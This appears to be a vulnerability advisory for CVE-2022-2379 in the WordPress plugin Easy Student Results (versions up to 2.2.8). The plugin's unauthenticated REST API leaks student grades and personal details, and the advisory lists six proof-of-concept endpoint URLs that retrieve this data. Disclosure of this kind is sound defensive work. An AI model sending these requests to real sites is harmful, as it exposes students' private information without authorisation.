Lucene search
Raad Haddad of Cloudyrion GmbHWPEX-ID:0773BA24-212E-41D5-9AE0-1416EA2C9DB6HistoryJul 19, 2022 - 12:00 a.m.
Easy Student Results <= 2.2.8 - Sensitive Information Disclosure via REST API
2022-07-1900:00:00
Raad Haddad of Cloudyrion GmbH
92
0.028 Low
EPSS
Percentile
90.8%
The plugin lacks authorisation in its REST API, allowing unauthenticated users to retrieve information related to the courses, exams, departments as well as student’s grades and PII such as email address, physical address, phone number etc
When the "Enable API for Mobile Apps" settings (/wp-admin/admin.php?page=rps_result_settings) is enabled
https://example.com/wp-json/rps_result/v1/route/show_result?exam_record_id=2&student_id=32
https://example.com/wp-json/rps_result/v1/route/student_fields
https://example.com/wp-json/rps_result/v1/route/search_student?department_id=1&batch_id=1&semester_id=1
https://example.com/wp-json/rps_result/v1/route/result_fields
https://example.com/wp-json/rps_result/v1/route/list_results?exam_id=1&department_id=1&batch_id=1
https://example.com/wp-json/rps_result/v1/route/schema
Related
patchstack
patchstack
wpvulndb
wpvulndb
nvd
nvd
CVE-2022-2379
2022-08-15 11:21:23
nuclei
nuclei
WordPress Easy Student Results <=2.2.8 - Improper Authorization
2022-11-09 14:18:37
cve
cve
CVE-2022-2379
2022-08-15 11:21:23
prion
prion
Design/Logic Flaw
2022-08-15 11:21:00
cvelist
cvelist